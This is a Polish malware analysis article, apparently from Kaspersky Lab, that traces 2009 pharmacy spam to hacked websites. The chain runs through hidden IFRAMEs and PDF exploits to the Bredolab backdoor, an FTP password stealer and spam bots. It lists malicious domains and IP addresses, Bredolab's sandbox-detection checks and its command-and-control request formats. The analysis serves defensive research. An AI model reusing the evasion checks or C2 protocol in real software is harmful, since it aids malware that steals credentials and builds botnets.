Fabryka pieniędzy

Artykuł ten stanowi analizę jednej wiadomości spamowej i przedstawia metody stosowane dzisiaj przez cyberprzestępców w celu tworzenia botnetów i przeprowadzania masowych wysyłek spamowych. Opisane metody i techniki są bez wątpienia nielegalne, a cyberprzestępcy wykorzystują je w jednym celu: aby się wzbogacić.

Na początku lata 2009 roku laboratorium filtrowania zawartości firmy Kaspersky Lab zaczęło otrzymywać e-maile, które na pierwszy rzut oka wydawały się typowymi wiadomościami spamowymi. E-maile promowały leki i wykorzystywały standardowy format, który zawierał HTML oraz osadzone obrazy:

Jednak wiadomości te posiadały jedną cechę, która wyróżniała je na tle innego spamu. Zawarte w nich odsyłacze nie prowadziły do stron spamerów, ale stron HTML-owych na legalnych portalach.

Domeny w odsyłaczach różniły się w zależności od wiadomości, jednak ścieżka do serwera była zawsze taka sama: “1/2/3/4/buy.html.”

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic02.png )

Wszystkie strony, do których prowadziły odsyłacze, zawierały jednowierszowy plik HTML ze znacznikiem META refresh. Znacznik ten był wykorzystywany do przekierowywania użytkownika na inną stronę - w tym przypadku, sklep internetowy sprzedający leki reklamowane przez spamerów.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic04.png )

Jedną z metod wykorzystywanych do wykrywania spamu jest czarna lista nazw domen, do których prowadzą odsyłacze w wiadomościach spamowych. Pozwala to wykrywać wszystkie wiadomości wysyłane w masowych wysyłkach, niezależnie od tekstu w treści wiadomości. Jednak w tym przypadku, domeny, do których prowadziły odsyłacze w wiadomości, nie mogły zostać umieszczone na czarnej liście, ponieważ odsyłacze prowadziły do legalnych stron internetowych. Co więcej, każdego dnia nasi analitycy identyfikowali kolejnych 10 nowych domen. Ta metoda obchodzenia filtrów spamowych znana jest spamerom od wielu lat, jest jednak rzadko wykorzystywana, ponieważ wiąże się z wyższymi kosztami niż zakup nowych domen.

Strony internetowe, do których prowadziły odsyłacze, zostały prawdopodobnie zhakowane i były wykorzystywane przez cyberprzestępców do przekierowywania użytkowników na strony spamerów. Wciąż jednak nie wiedzieliśmy, w jaki sposób cyberprzestępcy zdołali włamać się na tak wiele stron.

Włamanie się przy użyciu standardowych metod nie byłoby możliwe w przypadku większości z tych stron. Szybka analiza zhakowanych zasobów nie ujawniła żadnych wspólnych luk w zabezpieczeniach. Do stworzenia tych stron nie wykorzystano również tych samych technologii itd. Ponadto, większość z nich nie zawierała żadnych skryptów, a jedynie HTML. Jedyną rzeczą, jaka je łączyła, był folder zawierający plik "buy.html". Zawierał on znacznik HTML, który przekierowywał użytkowników do sklepu internetowego spamerów, w którym sprzedawane były lekarstwa.

Jednak dogłębna analiza jednej ze zhakowanych stron ujawniła dobrze ukrytą ramkę IFRAME, która przekierowywała do strony o nazwie b9g.ru. Podziałało to jak światełko ostrzegawcze: IFRAME odsyłający do podejrzanych stron internetowych jest często wykorzystywany przez cyberprzestępców do infekowania komputerów przy użyciu exploitów.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic05.png )

Analiza ujawniła, że b9g.ru znajduje się pod pięcioma różnymi adresami IP:

77.37.20.130
90.156.144.78
77.37.19.173
77.37.19.179
oraz 77.37.19.205.

Po zebraniu informacji o domenach, które również zostały zarejestrowane pod tymi adresami, zdołaliśmy zidentyfikować domeny, gdzie adresy były wykorzystywane do umieszczenia ramki IFRAME na zhakowanych stronach: a31.ru, b5r.ru, b5z.ru, b7p.ru, b8o.ru, b9g.ru, c6y.ru, c8k.at, f5l.at, f5x.at itd. Potwierdziło to nasze podejrzenia odnośnie zagrożenia, jakie stanowi ramka IFRAME wykryta na zhakowanej stronie.

Kolejnym krokiem było zidentyfikowanie, jakie programy były pobierane na komputery użytkowników ze strony http://b9g.ru:*/**.php. Tak jak się spodziewaliśmy, już po pierwszym odwiedzeniu tej strony na nasz komputer zostały pobrane exploity wraz z index.php. Cyberprzestępcy wykorzystali szereg różnych luk w zabezpieczeniach oprogramowania; największe zagrożenie stanowiły exploity wykorzystujące luki w zabezpieczeniach PDF.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic06.png )

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic07.png )
Zaszyfrowany i niezaszyfrowany index.php

Dzięki wykorzystaniu luk w zabezpieczeniach pobrany został program Backdoor.Win32.Bredolab. Szkodnik ten wykorzystuje technologie rootkit, pobiera i instaluje inne szkodliwe programy.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic08.png )

Bredolab przeciwdziała próbom uruchomienia go w piaskownicy, sprawdzając, czy istnieje

• Nazwa użytkownika, taka jak: USER, user, CurrentUser, Sandbox;
  • Nazwa komputera SANDBOX;
  • Ciąg VBOX w HKLM\HARDWARE\Description\System\SystemBiosVersion
  • Następujące wartości w kluczu ProductID w HKLM\Microsoft\Windows\CurrentVersion: o 55274-640-2673064-23950 (JoeBox) o 76487-644-3177037-23510 (CWSandbox) o 76487-337-8429955-22614 (Anubis)

Jeżeli jeden z tych warunków zostanie spełniony, szkodliwy program przestanie działać.

Bredolab przestaje również działać, jeżeli na zainfekowanym komputerze jest zainstalowany COMODO Firewall.

W przeciwnym razie Bredolab kopiuje się do %Temp%\~TM27FB4A.TMP, wstrzykuje swój kod do explorer.exe, uruchamia nowy wątek i przenosi się do %Temp%\~TM%TempName%. Następnie bot uruchamia się w tym wątku, a pierwotny proces zostaje zakończony.

Po tym, jak bot skutecznie połączy się z centrum kontroli, wysyła żądanie GET:

GET /l/controller.php?action=bot&entity_list={liczby oddzielone przecinkami &uid=11&first={0|1}&guid={VolumeSerialNumber} &uid=11&first={0|1}&guid={VolumeSerialNumber}&rnd=6293712

W odpowiedzi serwer przekazuje zaszyfrowane programy do bota. Programy te mogą następnie zostać zapisane do nowego pliku, %Windows%\Temp\wpv%rand_number%.exe, który jest następnie uruchamiany, lub do nowo stworzonego procesu svchost.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic09.png )

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 06 Jul 2009 17:08:22 GMT
Content-Type: text/html; charset=utf-8
Connection: close
X-Powered-By: PHP/5.1.6
Version: 1
Content-Length: 55709
Entity-Info: 1241530597:32768:1;1246898982:22941:2;
Rnd: 982101
Magic-Number:
32|1|187:55:66:132:143:54:243:114:97:146:132:5:192:141:199:113:160:130:101:
167:50:61:32:107:127:128:84:144:169:61:158:100:…

Bot informuje właściciela botnetu o swoich działaniach, wysyłając żądanie GET:
GET /l/controller.php?action=report&guid=0&rnd=6293712&uid=11& entity={number:unique_start|
uniquefailed|repeatstart|repeat_failed;number:...}

Po tym, jak bot połączy się z centrum kontroli, zainfekowany system pobiera i instaluje program o nazwie Trojan-PSW.Win32.Agent.mzh. Szkodnik ten kradnie hasła do klientów FTP.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic10.png )

Skradzione hasła do klienta FTP są następnie wysyłane na następujący adres:

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic11.png )

Sytuacja była jasna. Cyberprzestępcy nie próbowali włamywać się na strony internetowe przy użyciu wstrzykiwania SQL lub exploitów atakujących silniki stron - zamiast tego kradli po prostu hasła do klientów FTP w celu przejęcia kontroli nad zawartością stron.

Według informacji o trojanie Trojan-PSW.Win32.Agent.mzh zamieszczonych na forach dla hakerów, wynaleziono system umożliwiający kradzież haseł do stron; trojan ten stanowił część tego systemu, który można było kupić za 2 000 dolarów.

Tydzień później, centrum kontroli botnetu wydało polecenie pobrania botów w celu wysyłania spamu: wśród botów znajdowały się tak znane szkodniki, jak Rustock (Backdoor.Win32.HareBot) i Pushdo (Backdoor.Win32.NewRest.aq).

Po upływie kolejnego tygodnia na zainfekowanych maszynach zostały zainstalowane również programy z rodziny Koobface oraz fałszywy program antywirusowy.

Niewielkie badanie, które rozpoczęło się od spamu wysłanego na adres webmaster@viruslist.com, ujawniło, w jaki sposób działają cyberprzestępcy:

[

]( http://viruslist.pl/images/vlanalysis/golov_spambot0909_pic12_en.png )

System ten pokazuje technologie i techniki często stosowane do tworzenia botnetów wykorzystywanych do wysyłania masowych wysyłek spamowych:

1. Włamanie się do legalnych zasobów.
2. Umieszczenie na zhakowanych portalach stron, które przekierowują do stron spamerów.
3. Umieszczenie na zhakowanych portalach odsyłaczy do exploitów.
4. Tworzenie botnetu z komputerów, które zostały zainfekowane w wyniku odwiedzenia zhakowanych stron.
5. Kradzież haseł użytkowników do stron internetowych.
6. Pobieranie botów spamowych w celu przeprowadzania masowych wysyłek i innych szkodliwych programów na komputery w botnecie. Metody te zapewniają płynne działanie procesu, który w idealnym świecie cyberprzestępczym jest cykliczny. ##Wnioski

Wysyłanie spamu zawierającego odsyłacze do zhakowanych i zainfekowanych stron internetowych jest powszechną praktyką. Co godzinę identyfikujemy dziesiątki nowych adresów tego typu.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic14.png )

Odsyłacz (http://.../1.html) wskazuje na stronę na zhakowanym portalu internetowym, która zawiera znacznik przekierowujący do sklepu internetowego sprzedającego lekarstwa.

Spamerzy stosują tego rodzaju taktyki w wielu różnych wiadomościach e-mail, zmieniając nazwę strony, do której są przekierowywani użytkownicy i dostarczając szereg różnych exploitów przy użyciu IFRAME. Jednak główny cel jest zawsze taki sam: wszystkie stosowane technologie są wykorzystywane do zarabiania pieniędzy.

W lipcu tego roku pojawiły się informacje o włamaniu się na stronę Torrentreactor. Cyberprzestępcy wykorzystali znaczniki, które przekierowywały do strony zawierającej exploity; było jasne, że do włamania się wykorzystano szkodliwy program stworzony w celu kradzieży haseł do FTP-a.

[

]( http://www.viruslist.com/en/images/vlill/golov_spambot0909_pic15.png )

Jest to kolejny przykład wielu podobnych przypadków włamań hakerskich.